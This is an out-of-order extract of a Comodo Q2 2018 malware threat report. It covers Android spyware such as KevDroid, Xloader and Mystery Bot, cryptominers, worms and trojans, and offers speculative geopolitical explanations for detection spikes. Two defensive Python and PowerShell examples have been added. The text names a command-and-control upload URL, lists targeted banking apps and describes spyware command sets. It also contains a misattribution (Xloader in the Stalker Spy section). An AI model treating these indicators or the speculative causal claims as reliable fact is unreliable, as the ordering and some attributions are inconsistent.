Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free." Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news," Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility."
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several significant new trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infections of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
The next malware in line prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and digits, so it is almost impossible to remember or to type in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a gap they can use to their advantage.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into the cybercriminals' hands.
A new Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack:
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
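As an added example, not code from the report, here is a small defensive "paste guard" in Python that checks the swap pattern described above: it compares the address the user copied with the address now on the clipboard, and validates a Bitcoin address with Base58Check before the transfer is submitted. The address patterns and the check_paste helper are assumptions of this example; the two addresses in the demo are the ones quoted in the report.

```python
import hashlib
import re

# Address shapes this guard recognises (assumption: legacy/P2SH Bitcoin and Ethereum only).
ADDRESS_PATTERNS = {
    "btc": re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def address_kind(text):
    """Return 'btc', 'eth' or None depending on whether text looks like a wallet address."""
    text = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return kind
    return None


def b58decode(text):
    """Decode a Base58 string to bytes; each leading '1' encodes a leading zero byte."""
    value = 0
    for ch in text:
        value = value * 58 + B58_ALPHABET.index(ch)  # ValueError on a non-Base58 char
    body = value.to_bytes((value.bit_length() + 7) // 8, "big")
    leading_zeros = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_zeros + body


def btc_checksum_ok(address):
    """Base58Check: the last 4 bytes must equal the first 4 bytes of SHA256(SHA256(payload))."""
    try:
        raw = b58decode(address)
    except ValueError:
        return False
    if len(raw) != 25:  # 1 version byte + 20-byte hash + 4-byte checksum
        return False
    payload, checksum = raw[:-4], raw[-4:]
    digest = hashlib.sha256(hashlib.sha256(payload).digest()).digest()
    return digest[:4] == checksum


def check_paste(copied, clipboard_now):
    """Compare what the user copied with what is about to be pasted.

    'swapped' is True when both strings are wallet addresses but differ, which is
    exactly what a clipboard hijacker produces; 'valid' reports whether the pasted
    address passes its format test (and, for Bitcoin, its Base58Check checksum).
    """
    kind_copied = address_kind(copied)
    kind_now = address_kind(clipboard_now)
    swapped = (kind_copied is not None and kind_now is not None
               and copied.strip() != clipboard_now.strip())
    if kind_now == "btc":
        valid = btc_checksum_ok(clipboard_now.strip())
    else:
        valid = kind_now is not None
    return {"kind": kind_now, "swapped": swapped, "valid": valid}


if __name__ == "__main__":
    # The two addresses from the report's example: the user copied the first,
    # the hijacker put the second on the clipboard.
    copied = "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"
    on_clipboard = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"
    print(check_paste(copied, on_clipboard))
```

A wallet or browser extension would call check_paste at paste time and refuse to submit the transfer when swapped is True; the guard only sees the two strings, so it works offline.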
Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a serious new challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. It is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.
If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today, spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It's distributed in three versions:
Version 1: Naver Defender
Version 2: Netease Defender
Version 3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details (contacts, ID, name, phone numbers and the owner's email address). It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server, httphttpcgalimcomadminhrpupuphpdo=upload.
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.
Version 3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' command and control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of malware dissemination was social networks.
Version 1: Dardesh Google Play Services Instant Apps
Version 2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts the metadata and makes changes on the victim's device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions:
Version 1: Telegram Groups انتخاب دھم
Version 2: Postrall Yes For Referendum انتخاب دھم
Version 3: Celebs Gone Wild جریدة النھار الکویتیة 剑侠挂机
Version 4: VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.
The third version is included in spyware named "Spymaster Pro" and can:
- Enable and disable the GPS services
- Record audio and send it to the Command & Control server
- Upload image files
- Collect information about the installed applications
- Collect the browser's data
- Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of the previous versions, it includes some additional tricks:
- Extracts photos, audio and videos
- Records the screen
- Executes shell commands
- Records calls
4.1.3 MikeSpy
Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend, it delivers a bundle of malicious abilities:
- Takes control of the Bluetooth adapter
- Extracts data about accounts, contact details and installed apps
- Extracts data from the WhatsApp message DB and related keys
- Uploads the collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with a purposeful hunt for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Versions 1 to 3: FaceBook Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
- Extract the device information
- Delete SMS
- Set ringer mode
- Monitor incoming SMS messages
- Clear memory
- Check for the presence of the following banking applications: comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbs
- Extract contact details
- Set Wi-Fi to always on
Version 2 can execute additional commands:
- Send SMS and read outgoing SMS
- Enable and disable a Wi-Fi connection
- Access a location specified by the attackers
- Make recordings
- Make calls
4.1.5 Stalker Spy
The next malware in line is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.
App Distribution:
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license."
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some of the commands that the malware can execute on your device:
- Send_SMS: extract SMS content and send it to the C&C server
- Send_USSD: send the USSD to the C&C server
- Gethistory: monitor browser history
- Start_AllApp: gather info about installed applications
- Send_call: set the Intent action to call
- Forward_call: forward incoming calls
- ResForward_call: reset call forwarding
- Go_Smsmnd: delete SMS content
- Go_GetAlls: get SMS history
- Dell_sms: delete SMS content in a conversation
- Send_spam: send spam SMS
- Start_Inject: call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot:
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp softbankcomapp docomocomapp.
Here are some commands from its Command and Control server:
- contacts: get contact details and email ID
- Mute: set action to mute
- Mms: get MMS content
- info: get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader Update Flash Player Android Update WhatsApp Viber
Version 2: Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
- depostbankfinanzassistent
- plmbank
- aibibankandroid
The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly operates on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.
Version 1:
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it's sold in three options: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run." But it runs in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1:
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake "skip option" notification. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises shown in the figure.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Version 1: Netflix Hack Instagram Hack
Version 2: TSF Launcher
Version 3: Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via... another cryptominer, named CoinMiner.
How is it possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim: thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April
4.2.2 May 2018
Android-targeted malware in May
4.2.3 June 2018
Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report, we place worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018, Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.
In Q2 2018, Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter, the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an “IM” or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which in 2012 led the FBI to arrest 10 people for spreading banking malware via social networks using the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected in Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom (“gb” for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK’s Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that “infects” other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a “severe” virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a “Remote Service Account”.
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
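The account-creation behaviour attributed to Starter above leaves artefacts a defender can check for directly. As an added example that is not part of the Comodo report, the following PowerShell audits the local Administrators group against an allow-list and correlates the matching Security-log events; the allow-list and look-back window are assumptions to adapt to your own baseline.

```powershell
# Added example, not from the Comodo report: look for the Starter-style pattern of a
# local account being created and then added to the Administrators group.
# Run in an elevated Windows PowerShell 5.1+ session (reading the Security log requires it).

$ExpectedAdmins = @('Administrator', 'Domain Admins')   # assumption: your baseline admins
$LookbackDays   = 7                                     # assumption: audit window in days

function Resolve-MemberName($data) {
    # 4732 events for local accounts often carry '-' as MemberName and only a SID,
    # so fall back to translating the SID; if the account is already gone, keep the SID.
    if ($data.MemberName -and $data.MemberName -ne '-') { return ($data.MemberName -split '\\')[-1] }
    try {
        $acct = ([System.Security.Principal.SecurityIdentifier]$data.MemberSid).Translate(
                    [System.Security.Principal.NTAccount])
        return ($acct.Value -split '\\')[-1]
    } catch { return $data.MemberSid }
}

function Get-UnexpectedLocalAdmins {
    # Members of BUILTIN\Administrators (SID S-1-5-32-544, independent of UI language)
    # whose short name is not on the allow-list.
    Get-LocalGroupMember -SID 'S-1-5-32-544' | Where-Object {
        $ExpectedAdmins -notcontains ($_.Name -split '\\')[-1]
    } | Select-Object Name, ObjectClass, PrincipalSource
}

function Get-AdminAccountEvents {
    # 4720 = a user account was created; 4732 = a member was added to a
    # security-enabled local group. We only keep 4732s whose target group is Administrators.
    $since  = (Get-Date).AddDays(-$LookbackDays)
    $filter = @{ LogName = 'Security'; Id = 4720, 4732; StartTime = $since }
    foreach ($ev in Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue) {
        $data = @{}
        foreach ($d in ([xml]$ev.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        if ($ev.Id -eq 4720) {
            [pscustomobject]@{ Time = $ev.TimeCreated; Event = 'AccountCreated'
                               Account = $data.TargetUserName; By = $data.SubjectUserName }
        } elseif ($data.TargetSid -eq 'S-1-5-32-544') {
            [pscustomobject]@{ Time = $ev.TimeCreated; Event = 'AddedToAdministrators'
                               Account = (Resolve-MemberName $data); By = $data.SubjectUserName }
        }
    }
}

function Find-StarterLikeAccounts {
    # An account that was both created and made an administrator inside the window,
    # or that is currently an unexpected administrator, is worth an analyst's attention.
    $events   = @(Get-AdminAccountEvents)
    $created  = $events | Where-Object Event -eq 'AccountCreated'       | ForEach-Object Account
    $elevated = $events | Where-Object Event -eq 'AddedToAdministrators' | ForEach-Object Account
    foreach ($acct in ($created | Where-Object { $elevated -contains $_ } | Sort-Object -Unique)) {
        [pscustomobject]@{ Account = $acct; Finding = 'Created and added to Administrators within window' }
    }
    foreach ($m in Get-UnexpectedLocalAdmins) {
        [pscustomobject]@{ Account = $m.Name; Finding = 'Unexpected member of Administrators' }
    }
}

Find-StarterLikeAccounts | Format-Table -AutoSize
```

Events 4720 and 4732 are only written when "Audit User Account Management" and "Audit Security Group Management" are enabled, so an empty result from the event side is not proof of absence.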
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a “Severe” malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
